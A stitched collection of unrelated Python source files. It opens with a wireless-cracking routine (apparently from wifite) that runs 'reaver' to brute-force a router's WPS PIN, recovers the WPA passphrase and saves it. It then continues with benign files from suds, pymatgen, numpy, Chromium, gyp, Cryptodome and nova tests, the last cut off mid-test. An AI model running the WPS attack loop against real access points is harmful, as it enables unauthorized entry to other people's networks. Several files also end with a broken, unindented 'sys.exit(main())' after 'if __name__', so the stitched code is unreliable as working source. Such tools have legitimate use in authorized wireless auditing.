# WPS FUNCTIONS #
#################
def wps_attack(iface, target):
    """
    Mounts attack against target on iface.
    Uses "reaver" to attempt to brute force the PIN.
    Once PIN is found, PSK can be recovered.
    PSK is displayed to user and added to WPS_FINDINGS

    Returns True once the PIN (and possibly PSK) is recovered,
    False otherwise.
    """
    print GR+' [0:00:00]'+W+' initializing %sWPS PIN attack%s on %s' % \
        (G, W, G+target.ssid+W+' ('+G+target.bssid+W+')'+W)

    cmd = ['reaver',
           '-i', iface,
           '-b', target.bssid,
           '-o', temp + 'out.out',  # Dump output to file to be monitored
           '-a',  # auto-detect best options, auto-resumes sessions, doesn't require input!
           '-c', target.channel,
           # '--ignore-locks',
           '-vv']  # verbose output
    proc = Popen(cmd, stdout=DN, stderr=DN)

    cracked = False    # Flag for when password/pin is found
    percent = 'x.xx%'  # Percentage complete
    aps = 'x'          # Seconds per attempt
    time_started = time.time()
    last_success = time_started  # Time of last successful attempt
    last_pin = ''      # Keep track of last pin tried (to detect retries)
    retries = 0        # Number of times we have attempted this PIN
    tries_total = 0    # Number of times we have attempted all pins
    tries = 0          # Number of successful attempts
    pin = ''
    key = ''
    try:
        while not cracked:
            # Poll reaver's output file roughly once per second.
            time.sleep(1)
            if proc.poll() != None:
                # Process stopped: Cracked? Failed?
                # Scan its final output for the PIN/PSK result lines.
                inf = open(temp + 'out.out', 'r')
                lines = inf.read().split('\n')
                inf.close()
                for line in lines:
                    # When it's cracked:
                    if line.find("WPS PIN: '") != -1:
                        pin = line[line.find("WPS PIN: '") + 10:-1]
                    if line.find("WPA PSK: '") != -1:
                        key = line[line.find("WPA PSK: '") + 10:-1]
                        cracked = True
                break
            if not os.path.exists(temp + 'out.out'): continue
            inf = open(temp + 'out.out', 'r')
            lines = inf.read().split('\n')
            inf.close()
            for line in lines:
                if line.strip() == '': continue
                # Status
                if line.find(' complete @ ') != -1 and len(line) > 8:
                    percent = line.split(' ')[1]
                    i = line.find(' (')
                    j = line.find(' seconds/', i)
                    if i != -1 and j != -1: aps = line[i+2:j]
                # PIN attempt
                elif line.find(' Trying pin ') != -1:
                    pin = line.strip().split(' ')[-1]
                    if pin == last_pin:
                        # Same pin repeated -> the previous attempt failed.
                        retries += 1
                    elif tries_total == 0:
                        # Very first pin seen: pre-decrement so the
                        # unconditional += 1 below leaves the total at 0
                        # (the first sighting is not counted as a success).
                        last_pin = pin
                        tries_total -= 1
                    else:
                        # A new pin was reached, so the previous attempt
                        # advanced; count it as a success.
                        last_success = time.time()
                        tries += 1
                        last_pin = pin
                        retries = 0
                    tries_total += 1
                # Warning
                elif line.endswith('10 failed connections in a row'): pass
                # Check for PIN/PSK
                elif line.find("WPS PIN: '") != -1:
                    pin = line[line.find("WPS PIN: '") + 10:-1]
                elif line.find("WPA PSK: '") != -1:
                    key = line[line.find("WPA PSK: '") + 10:-1]
                    cracked = True
            if cracked: break
            # Status line: elapsed time, success/total ratio, percent done.
            print ' %s WPS attack, %s success/ttl,' % \
                (GR+sec_to_hms(time.time()-time_started)+W, \
                G+str(tries)+W+'/'+O+str(tries_total)+W),
            if percent == 'x.xx%' and aps == 'x': print '\r',
            else:
                print '%s complete (%s sec/att) \r' % (G+percent+W, G+aps+W),

            # Give-up heuristics: overall timeout since last success,
            # per-PIN retry limit, and minimum success/total ratio.
            if WPS_TIMEOUT > 0 and (time.time() - last_success) > WPS_TIMEOUT:
                print R+'\n [!]'+O+' unable to complete successful try in %d seconds' % (WPS_TIMEOUT)
                print R+' [+]'+W+' skipping %s' % (O+target.ssid+W)
                break

            if WPS_MAX_RETRIES > 0 and retries > WPS_MAX_RETRIES:
                print R+'\n [!]'+O+' unable to complete successful try in %d retries' % (WPS_MAX_RETRIES)
                print R+' [+]'+O+' the access point may have WPS-locking enabled, or is too far away'+W
                print R+' [+]'+W+' skipping %s' % (O+target.ssid+W)
                break

            if WPS_RATIO_THRESHOLD > 0.0 and tries > 0 and (float(tries) / tries_total) < WPS_RATIO_THRESHOLD:
                print R+'\n [!]'+O+' successful/total attempts ratio was too low (< %.2f)' % (WPS_RATIO_THRESHOLD)
                print R+' [+]'+W+' skipping %s' % (G+target.ssid+W)
                break

            stdout.flush()
            # Clear out output file if bigger than 1mb
            # NOTE(review): no size check is actually performed -- the file
            # is truncated on every pass through the loop.
            inf = open(temp + 'out.out', 'w')
            inf.close()

        # End of big "while not cracked" loop

        if cracked:
            if pin != '': print GR+'\n\n [+]'+G+' PIN found: %s' % (C+pin+W)
            if key != '': print GR+' [+] %sWPA key found:%s %s' % (G, W, C+key+W)
            WPA_FINDINGS.append(W+"found %s's WPA key: \"%s\", WPS PIN: %s" % (G+target.ssid+W, C+key+W, C+pin+W))
            WPA_FINDINGS.append('')
            save_cracked(target.bssid, target.ssid, "Key is '" + key + "' and PIN is '" + pin + "'", 'WPA')

    except KeyboardInterrupt:
        print R+'\n (^C)'+O+' WPS brute-force attack interrupted'+W
        if attack_interrupted_prompt():
            send_interrupt(proc)
            print ''
            exit_gracefully(0)

    send_interrupt(proc)
    return cracked
#c = CapFile('hs/KillfuckSoulshitter_C0-C1-C0-07-54-DC_2.cap', 'Killfuck Soulshitter', 'c0:c1:c0:07:54:dc')
#WPA_CRACKER = 'aircrack'
#cracked = wpa_crack(c)
#print cracked
#exit_gracefully(1)
if __name__ == '__main__':
    try:
        banner()
        main()
    # Graceful shutdown on Ctrl+C (or Ctrl+D at an input prompt).
    except KeyboardInterrupt: print R+'\n (^C)'+O+' interrupted\n'+W
    except EOFError: print R+'\n (^D)'+O+' interrupted\n'+W
    exit_gracefully(0)
|
peerster/CouchPotatoServer | refs/heads/master | libs/suds/umx/attrlist.py | 211 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
"""
Provides filtered attribute list classes.
"""
from suds import *
from suds.umx import *
from suds.sax import Namespace
class AttrList:
    """
    A filtered attribute list.
    Items are included during iteration if they are in either the (xs) or
    (xml) namespaces.
    @ivar raw: The I{raw} attribute list.
    @type raw: list
    """

    def __init__(self, attributes):
        """
        @param attributes: A list of attributes
        @type attributes: list
        """
        self.raw = attributes

    def real(self):
        """
        Get list of I{real} attributes which exclude xs and xml attributes.
        @return: A list of I{real} attributes.
        @rtype: I{generator}
        """
        for a in self.raw:
            if self.skip(a):
                continue
            yield a

    def rlen(self):
        """
        Get the number of I{real} attributes which exclude xs and xml attributes.
        @return: A count of I{real} attributes.
        @rtype: L{int}
        """
        # sum() over the generator replaces the manual counter loop.
        return sum(1 for _ in self.real())

    def lang(self):
        """
        Get the value of the I{xml:lang} attribute, if present.
        (The previous docstring wrongly claimed a list was returned.)
        @return: The xml:lang value, or None when the attribute is absent.
        @rtype: str|None
        """
        for a in self.raw:
            if a.qname() == 'xml:lang':
                return a.value
        return None

    def skip(self, attr):
        """
        Get whether to skip (filter-out) the specified attribute.
        Skips attributes in the xmlns namespace or in any of the
        SOAP encoding/envelope namespaces.
        @param attr: An attribute.
        @type attr: I{Attribute}
        @return: True if should be skipped.
        @rtype: bool
        """
        ns = attr.namespace()
        skip = (
            Namespace.xmlns[1],
            'http://schemas.xmlsoap.org/soap/encoding/',
            'http://schemas.xmlsoap.org/soap/envelope/',
            'http://www.w3.org/2003/05/soap-envelope',
        )
        return ( Namespace.xs(ns) or ns[1] in skip )
|
czhengsci/pymatgen | refs/heads/master | dev_scripts/chemenv/explicit_permutations.py | 14 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import division, unicode_literals
"""
Development script of the ChemEnv utility to get the explicit permutations for coordination environments identified
with the explicit permutations algorithms (typically with coordination numbers <= 6)
"""
__author__ = "David Waroquiers"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "2.0"
__maintainer__ = "David Waroquiers"
__email__ = "david.waroquiers@gmail.com"
__date__ = "Feb 20, 2016"
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometry_finder import LocalGeometryFinder
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometry_finder import AbstractGeometry
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import AllCoordinationGeometries
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import ExplicitPermutationsAlgorithm
import numpy as np
import itertools
import json
import os
class Algo(object):
    """Minimal stand-in for a coordination-geometry algorithm object.

    Only a ``permutations`` attribute is required; the script below
    assigns it before handing the instance to the geometry finder.
    """
    pass
if __name__ == '__main__':

    # Choose the geometry
    allcg = AllCoordinationGeometries()
    while True:
        cg_symbol = raw_input('Enter symbol of the geometry for which you want to get the explicit permutations : ')
        try:
            cg = allcg[cg_symbol]
            break
        except LookupError:
            print('Wrong geometry, try again ...')
            continue

    # Check if the algorithm currently defined for this geometry corresponds to the explicit permutation algorithm
    for algo in cg.algorithms:
        if algo.algorithm_type != 'EXPLICIT_PERMUTATIONS':
            raise ValueError('WRONG ALGORITHM !')

    # Build a brute-force algorithm: every permutation of the CN sites.
    algo = Algo()
    algo.permutations = []
    for perm in itertools.permutations(range(cg.coordination)):
        algo.permutations.append(perm)

    # Set up a randomized-but-ordered perfect environment for this geometry.
    lgf = LocalGeometryFinder()
    lgf.setup_parameters(structure_refinement=lgf.STRUCTURE_REFINEMENT_NONE)
    lgf.setup_test_perfect_environment(cg_symbol, randomness=True, indices='ORDERED')

    lgf.perfect_geometry = AbstractGeometry.from_cg(cg=cg)

    # Compute symmetry measures for every permutation against the
    # perfect geometry.
    points_perfect = lgf.perfect_geometry.points_wocs_ctwocc()
    res = lgf.coordination_geometry_symmetry_measures_standard(coordination_geometry=cg,
                                                               algo=algo,
                                                               points_perfect=points_perfect)
    (csms, perms, algos, local2perfect_maps, perfect2local_maps) = res

    # Keep one representative permutation per distinct CSM value
    # (permutations yielding the same CSM are equivalent).
    csms_with_recorded_permutation = []
    explicit_permutations = []
    for icsm, csm in enumerate(csms):
        found = False
        for csm2 in csms_with_recorded_permutation:
            if np.isclose(csm, csm2):
                found = True
                break
        if not found:
            csms_with_recorded_permutation.append(csm)
            explicit_permutations.append(perms[icsm])

    print('Permutations found : ')
    print(explicit_permutations)
    print('Current algorithm(s) :')
    for algo in cg.algorithms:
        print(algo)
        if algo.algorithm_type == 'EXPLICIT_PERMUTATIONS':
            print(algo.permutations)
        else:
            raise ValueError('WRONG ALGORITHM !')

    # Optionally persist the reduced permutation list as a new geometry file.
    test = raw_input('Save it ? ("y" to confirm)')
    if test == 'y':
        if len(cg.algorithms) != 1:
            raise ValueError('Multiple algorithms !')
        cg._algorithms = [ExplicitPermutationsAlgorithm(permutations=explicit_permutations)]
        newgeom_dir = 'new_geometry_files'
        if not os.path.exists(newgeom_dir):
            os.makedirs(newgeom_dir)
        f = open('{}/{}.json'.format(newgeom_dir, cg_symbol), 'w')
        json.dump(cg.as_dict(), f)
        f.close()
GbalsaC/bitnamiP | refs/heads/master | venv/lib/python2.7/site-packages/numpy/testing/print_coercion_tables.py | 23 | #!/usr/bin/env python
"""Prints type-coercion tables for the built-in NumPy types"""
import numpy as np
# Generic object that can be added, but doesn't do anything else
# Generic object that can be added, but doesn't do anything else
class GenericObject:
    """Minimal object supporting '+' from either side; used to probe how
    NumPy coerces object-dtype operands in the coercion tables below."""

    # dtype reported when this object is wrapped in an ndarray: plain
    # Python object ('O').
    dtype = np.dtype('O')

    def __init__(self, v):
        self.v = v

    def __add__(self, other):
        # Addition ignores the other operand entirely and returns self.
        return self

    # Right-addition behaves identically to left-addition.
    __radd__ = __add__
def print_cancast_table(ntypes):
    """Print a matrix of np.can_cast(row, col) for every pair of type
    characters in ntypes: 1 = castable, 0 = not castable."""
    # Header row: an 'X' corner cell followed by each type character.
    print 'X',
    for char in ntypes: print char,
    print
    for row in ntypes:
        print row,
        for col in ntypes:
            print int(np.can_cast(row, col)),
        print
def print_coercion_table(ntypes, inputfirstvalue, inputsecondvalue, firstarray, use_promote_types=False):
    """Print the dtype character produced by combining every pair of types.

    ntypes            -- iterable of dtype characters (rows and columns).
    inputfirstvalue   -- value used to construct the row operand.
    inputsecondvalue  -- value used to construct the column operand.
    firstarray        -- if True, wrap the row operand in a 1-element
                         ndarray; otherwise use a scalar.
    use_promote_types -- if True, show np.promote_types of the two dtypes
                         instead of the dtype produced by np.add.

    Failed combinations are encoded in the cell: '!' ValueError,
    '@' OverflowError, '#' TypeError.
    """
    print '+',
    for char in ntypes: print char,
    print
    for row in ntypes:
        # 'O' uses the GenericObject helper so object addition is defined.
        if row == 'O':
            rowtype = GenericObject
        else:
            rowtype = np.obj2sctype(row)
        print row,
        for col in ntypes:
            if col == 'O':
                coltype = GenericObject
            else:
                coltype = np.obj2sctype(col)
            try:
                if firstarray:
                    rowvalue = np.array([rowtype(inputfirstvalue)], dtype=rowtype)
                else:
                    rowvalue = rowtype(inputfirstvalue)
                colvalue = coltype(inputsecondvalue)
                if use_promote_types:
                    char = np.promote_types(rowvalue.dtype, colvalue.dtype).char
                else:
                    value = np.add(rowvalue,colvalue)
                    if isinstance(value, np.ndarray):
                        char = value.dtype.char
                    else:
                        # Scalar result: report the dtype of its Python type.
                        char = np.dtype(type(value)).char
            except ValueError:
                char = '!'
            except OverflowError:
                char = '@'
            except TypeError:
                char = '#'
            print char,
        print
# Script body: print the cast table and the coercion tables for every
# NumPy type code, in scalar/array and positive/negative combinations.
print "can cast"
print_cancast_table(np.typecodes['All'])
print
print "In these tables, ValueError is '!', OverflowError is '@', TypeError is '#'"
print
print "scalar + scalar"
print_coercion_table(np.typecodes['All'], 0, 0, False)
print
print "scalar + neg scalar"
print_coercion_table(np.typecodes['All'], 0, -1, False)
print
print "array + scalar"
print_coercion_table(np.typecodes['All'], 0, 0, True)
print
print "array + neg scalar"
print_coercion_table(np.typecodes['All'], 0, -1, True)
print
print "promote_types"
print_coercion_table(np.typecodes['All'], 0, 0, False, True)
littlstar/chromium.src | refs/heads/nw | chrome/test/chromedriver/embed_extension_in_cpp.py | 158 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Embeds Chrome user data files in C++ code."""
import base64
import optparse
import os
import StringIO
import sys
import zipfile
import cpp_source
def main():
  """Zips the files given on the command line and embeds the archive,
  base64-encoded, as the C++ string constant kAutomationExtension."""
  parser = optparse.OptionParser()
  parser.add_option(
      '', '--directory', type='string', default='.',
      help='Path to directory where the cc/h file should be created')
  options, args = parser.parse_args()

  global_string_map = {}
  # Build an in-memory, uncompressed zip of all input files (flattened
  # to their basenames).
  string_buffer = StringIO.StringIO()
  zipper = zipfile.ZipFile(string_buffer, 'w')
  for f in args:
    zipper.write(f, os.path.basename(f), zipfile.ZIP_STORED)
  zipper.close()
  # Base64 so the binary archive can live inside a C++ string literal.
  global_string_map['kAutomationExtension'] = base64.b64encode(
      string_buffer.getvalue())
  string_buffer.close()

  cpp_source.WriteSource('embedded_automation_extension',
                         'chrome/test/chromedriver/chrome',
                         options.directory, global_string_map)
if __name__ == '__main__':
sys.exit(main())
|
IAMATinyCoder/SocialEDU | refs/heads/master | node_modules/gulp-sass/node_modules/node-sass/node_modules/pangyp/gyp/tools/pretty_sln.py | 806 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Prints the information in a sln file in a diffable way.
It first outputs each projects in alphabetical order with their
dependencies.
Then it outputs a possible build order.
"""
__author__ = 'nsylvain (Nicolas Sylvain)'
import os
import re
import sys
import pretty_vcproj
def BuildProject(project, built, projects, deps):
  """Print `project` in dependency order, recursing into unbuilt deps first.

  Appends each printed project to `built` so it is emitted only once.
  """
  # if all dependencies are done, we can build it, otherwise we try to build the
  # dependency.
  # This is not infinite-recursion proof.
  for dep in deps[project]:
    if dep not in built:
      BuildProject(dep, built, projects, deps)
  print project
  built.append(project)
def ParseSolution(solution_file):
  """Parses a Visual Studio .sln file.

  Args:
    solution_file: path to the solution file.

  Returns:
    A (projects, dependencies) tuple: projects maps project name ->
    [path, clsid, raw path] (with '_gyp' stripped from name/path);
    dependencies maps project name -> sorted list of dependency names.
  """
  # All projects, their clsid and paths.
  projects = dict()

  # A list of dependencies associated with a project.
  dependencies = dict()

  # Regular expressions that matches the SLN format.
  # (Raw strings: the escapes like \( are regex syntax, not string escapes.)
  # The first line of a project definition.
  begin_project = re.compile(r'^Project\("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942'
                             r'}"\) = "(.*)", "(.*)", "(.*)"$')
  # The last line of a project definition.
  end_project = re.compile('^EndProject$')
  # The first line of a dependency list.
  begin_dep = re.compile(
      r'ProjectSection\(ProjectDependencies\) = postProject$')
  # The last line of a dependency list.
  end_dep = re.compile('EndProjectSection$')
  # A line describing a dependency.
  dep_line = re.compile(' *({.*}) = ({.*})$')

  in_deps = False
  # BUGFIX: initialize explicitly -- previously a dependency line appearing
  # before the first project raised a NameError.
  current_project = None
  # Close the file deterministically instead of leaking the handle.
  with open(solution_file) as solution:
    for line in solution:
      results = begin_project.search(line)
      if results:
        # Hack to remove icu because the diff is too different.
        if results.group(1).find('icu') != -1:
          continue
        # We remove "_gyp" from the names because it helps to diff them.
        current_project = results.group(1).replace('_gyp', '')
        projects[current_project] = [results.group(2).replace('_gyp', ''),
                                     results.group(3),
                                     results.group(2)]
        dependencies[current_project] = []
        continue

      results = end_project.search(line)
      if results:
        current_project = None
        continue

      results = begin_dep.search(line)
      if results:
        in_deps = True
        continue

      results = end_dep.search(line)
      if results:
        in_deps = False
        continue

      results = dep_line.search(line)
      if results and in_deps and current_project:
        dependencies[current_project].append(results.group(1))
        continue

  # Change all dependencies clsid to name instead.
  for project in dependencies:
    # For each dependencies in this project
    new_dep_array = []
    for dep in dependencies[project]:
      # Look for the project name matching this cldis
      for project_info in projects:
        if projects[project_info][1] == dep:
          new_dep_array.append(project_info)
    dependencies[project] = sorted(new_dep_array)

  return (projects, dependencies)
def PrintDependencies(projects, deps):
  """Print each project (in sorted order) with its path and dependencies."""
  print "---------------------------------------"
  print "Dependencies for all projects"
  print "---------------------------------------"
  print "-- --"

  for (project, dep_list) in sorted(deps.items()):
    print "Project : %s" % project
    print "Path : %s" % projects[project][0]
    if dep_list:
      for dep in dep_list:
        print " - %s" % dep
    print ""

  print "-- --"
def PrintBuildOrder(projects, deps):
  """Print one possible build order: dependencies before dependents."""
  print "---------------------------------------"
  print "Build order "
  print "---------------------------------------"
  print "-- --"

  built = []
  for (project, _) in sorted(deps.items()):
    if project not in built:
      BuildProject(project, built, projects, deps)

  print "-- --"
def PrintVCProj(projects):
  """Pretty-print every project's .vcproj via the pretty_vcproj module.

  Relies on sys.argv[1] being the .sln path (project paths are resolved
  relative to it) and forwards sys.argv[3:] to pretty_vcproj.main.
  """
  for project in projects:
    print "-------------------------------------"
    print "-------------------------------------"
    print project
    print project
    print project
    print "-------------------------------------"
    print "-------------------------------------"

    # projects[project][2] is the raw (un-stripped) project path.
    project_path = os.path.abspath(os.path.join(os.path.dirname(sys.argv[1]),
                                                projects[project][2]))

    pretty = pretty_vcproj
    argv = [ '',
             project_path,
             '$(SolutionDir)=%s\\' % os.path.dirname(sys.argv[1]),
           ]
    argv.extend(sys.argv[3:])
    pretty.main(argv)
def main():
  """Entry point: parse the .sln named in argv[1] and print its dependency
  table and build order (plus each vcproj when --recursive is given)."""
  # check if we have exactly 1 parameter.
  if len(sys.argv) < 2:
    print 'Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0]
    return 1

  (projects, deps) = ParseSolution(sys.argv[1])
  PrintDependencies(projects, deps)
  PrintBuildOrder(projects, deps)

  if '--recursive' in sys.argv:
    PrintVCProj(projects)
  return 0
if __name__ == '__main__':
sys.exit(main())
|
hclivess/Stallion | refs/heads/master | nuitka/Cryptodome/Hash/RIPEMD.py | 7 | # -*- coding: utf-8 -*-
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
# This file exists for backward compatibility with old code that refers to
# Cryptodome.Hash.RIPEMD
"""Deprecated alias for `Cryptodome.Hash.RIPEMD160`"""
from Cryptodome.Hash.RIPEMD160 import new, block_size, digest_size
|
cernops/nova | refs/heads/master | nova/tests/unit/cells/test_cells_messaging.py | 2 | # Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For Cells Messaging module
"""
import uuid
import mock
from mox3 import mox
import oslo_messaging
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from oslo_utils import uuidutils
from nova.cells import messaging
from nova.cells import rpcapi as cells_rpcapi
from nova.cells import utils as cells_utils
from nova.compute import task_states
from nova.compute import vm_states
import nova.conf
from nova import context
from nova import db
from nova import exception
from nova import objects
from nova.objects import base as objects_base
from nova.objects import fields as objects_fields
from nova import rpc
from nova import test
from nova.tests.unit.cells import fakes
from nova.tests.unit import fake_instance
from nova.tests.unit import fake_server_actions
CONF = nova.conf.CONF
class CellsMessageClassesTestCase(test.NoDBTestCase):
    """Test case for the main Cells Message classes."""

    def setUp(self):
        super(CellsMessageClassesTestCase, self).setUp()
        fakes.init(self)
        self.ctxt = context.RequestContext('fake', 'fake')
        # 'api-cell' is the root of the fake cell topology built by fakes.
        self.our_name = 'api-cell'
        self.msg_runner = fakes.get_message_runner(self.our_name)
        self.state_manager = self.msg_runner.state_manager

    def test_reverse_path(self):
        path = 'a!b!c!d'
        expected = 'd!c!b!a'
        rev_path = messaging._reverse_path(path)
        self.assertEqual(expected, rev_path)

    def test_response_cell_name_from_path(self):
        # test array with tuples of inputs/expected outputs
        test_paths = [('cell1', 'cell1'),
                      ('cell1!cell2', 'cell2!cell1'),
                      ('cell1!cell2!cell3', 'cell3!cell2!cell1')]
        for test_input, expected_output in test_paths:
            self.assertEqual(expected_output,
                    messaging._response_cell_name_from_path(test_input))

    def test_response_cell_name_from_path_neighbor_only(self):
        # test array with tuples of inputs/expected outputs
        test_paths = [('cell1', 'cell1'),
                      ('cell1!cell2', 'cell2!cell1'),
                      ('cell1!cell2!cell3', 'cell3!cell2')]
        for test_input, expected_output in test_paths:
            self.assertEqual(expected_output,
                    messaging._response_cell_name_from_path(test_input,
                                                            neighbor_only=True))

    def test_response_to_json_and_from_json(self):
        fake_uuid = str(uuid.uuid4())
        response = messaging.Response(self.ctxt, 'child-cell!api-cell',
                                      objects.Instance(id=1, uuid=fake_uuid),
                                      False)
        json_response = response.to_json()
        deserialized_response = messaging.Response.from_json(self.ctxt,
                                                             json_response)
        obj = deserialized_response.value
        self.assertIsInstance(obj, objects.Instance)
        self.assertEqual(1, obj.id)
        self.assertEqual(fake_uuid, obj.uuid)

    def test_targeted_message(self):
        self.flags(max_hop_count=99, group='cells')
        target_cell = 'api-cell!child-cell2!grandchild-cell1'
        method = 'fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'
        tgt_message = messaging._TargetedMessage(self.msg_runner,
                                                 self.ctxt, method,
                                                 method_kwargs, direction,
                                                 target_cell)
        self.assertEqual(self.ctxt, tgt_message.ctxt)
        self.assertEqual(method, tgt_message.method_name)
        self.assertEqual(method_kwargs, tgt_message.method_kwargs)
        self.assertEqual(direction, tgt_message.direction)
        # NOTE: this previously compared target_cell with itself, which
        # could never fail.  Assert the message recorded the target.
        self.assertEqual(target_cell, tgt_message.target_cell)
        self.assertFalse(tgt_message.fanout)
        self.assertFalse(tgt_message.need_response)
        self.assertEqual(self.our_name, tgt_message.routing_path)
        self.assertEqual(1, tgt_message.hop_count)
        self.assertEqual(99, tgt_message.max_hop_count)
        self.assertFalse(tgt_message.is_broadcast)
        # Correct next hop?
        next_hop = tgt_message._get_next_hop()
        child_cell = self.state_manager.get_child_cell('child-cell2')
        self.assertEqual(child_cell, next_hop)

    def test_create_targeted_message_with_response(self):
        self.flags(max_hop_count=99, group='cells')
        our_name = 'child-cell1'
        target_cell = 'child-cell1!api-cell'
        msg_runner = fakes.get_message_runner(our_name)
        method = 'fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'up'
        tgt_message = messaging._TargetedMessage(msg_runner,
                                                 self.ctxt, method,
                                                 method_kwargs, direction,
                                                 target_cell,
                                                 need_response=True)
        self.assertEqual(self.ctxt, tgt_message.ctxt)
        self.assertEqual(method, tgt_message.method_name)
        self.assertEqual(method_kwargs, tgt_message.method_kwargs)
        self.assertEqual(direction, tgt_message.direction)
        # NOTE: this previously compared target_cell with itself, which
        # could never fail.  Assert the message recorded the target.
        self.assertEqual(target_cell, tgt_message.target_cell)
        self.assertFalse(tgt_message.fanout)
        self.assertTrue(tgt_message.need_response)
        self.assertEqual(our_name, tgt_message.routing_path)
        self.assertEqual(1, tgt_message.hop_count)
        self.assertEqual(99, tgt_message.max_hop_count)
        self.assertFalse(tgt_message.is_broadcast)
        # Correct next hop?
        next_hop = tgt_message._get_next_hop()
        parent_cell = msg_runner.state_manager.get_parent_cell('api-cell')
        self.assertEqual(parent_cell, next_hop)

    def test_targeted_message_when_target_is_cell_state(self):
        method = 'fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'
        target_cell = self.state_manager.get_child_cell('child-cell2')
        tgt_message = messaging._TargetedMessage(self.msg_runner,
                                                 self.ctxt, method,
                                                 method_kwargs, direction,
                                                 target_cell)
        self.assertEqual('api-cell!child-cell2', tgt_message.target_cell)
        # Correct next hop?
        next_hop = tgt_message._get_next_hop()
        self.assertEqual(target_cell, next_hop)

    def test_targeted_message_when_target_cell_state_is_me(self):
        method = 'fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'
        target_cell = self.state_manager.get_my_state()
        tgt_message = messaging._TargetedMessage(self.msg_runner,
                                                 self.ctxt, method,
                                                 method_kwargs, direction,
                                                 target_cell)
        self.assertEqual('api-cell', tgt_message.target_cell)
        # Correct next hop?
        next_hop = tgt_message._get_next_hop()
        self.assertEqual(target_cell, next_hop)

    def test_create_broadcast_message(self):
        # NOTE: a redundant duplicate flags(max_hop_count=99) call was
        # removed; this single call sets both options.
        self.flags(name='api-cell', max_hop_count=99, group='cells')
        method = 'fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'
        bcast_message = messaging._BroadcastMessage(self.msg_runner,
                                                    self.ctxt, method,
                                                    method_kwargs, direction)
        self.assertEqual(self.ctxt, bcast_message.ctxt)
        self.assertEqual(method, bcast_message.method_name)
        self.assertEqual(method_kwargs, bcast_message.method_kwargs)
        self.assertEqual(direction, bcast_message.direction)
        self.assertFalse(bcast_message.fanout)
        self.assertFalse(bcast_message.need_response)
        self.assertEqual(self.our_name, bcast_message.routing_path)
        self.assertEqual(1, bcast_message.hop_count)
        self.assertEqual(99, bcast_message.max_hop_count)
        self.assertTrue(bcast_message.is_broadcast)
        # Correct next hops?
        next_hops = bcast_message._get_next_hops()
        child_cells = self.state_manager.get_child_cells()
        self.assertEqual(child_cells, next_hops)

    def test_create_broadcast_message_with_response(self):
        self.flags(max_hop_count=99, group='cells')
        our_name = 'child-cell1'
        msg_runner = fakes.get_message_runner(our_name)
        method = 'fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'up'
        bcast_message = messaging._BroadcastMessage(msg_runner, self.ctxt,
                method, method_kwargs, direction, need_response=True)
        self.assertEqual(self.ctxt, bcast_message.ctxt)
        self.assertEqual(method, bcast_message.method_name)
        self.assertEqual(method_kwargs, bcast_message.method_kwargs)
        self.assertEqual(direction, bcast_message.direction)
        self.assertFalse(bcast_message.fanout)
        self.assertTrue(bcast_message.need_response)
        self.assertEqual(our_name, bcast_message.routing_path)
        self.assertEqual(1, bcast_message.hop_count)
        self.assertEqual(99, bcast_message.max_hop_count)
        self.assertTrue(bcast_message.is_broadcast)
        # Correct next hops?
        next_hops = bcast_message._get_next_hops()
        parent_cells = msg_runner.state_manager.get_parent_cells()
        self.assertEqual(parent_cells, next_hops)

    def test_self_targeted_message(self):
        target_cell = 'api-cell'
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
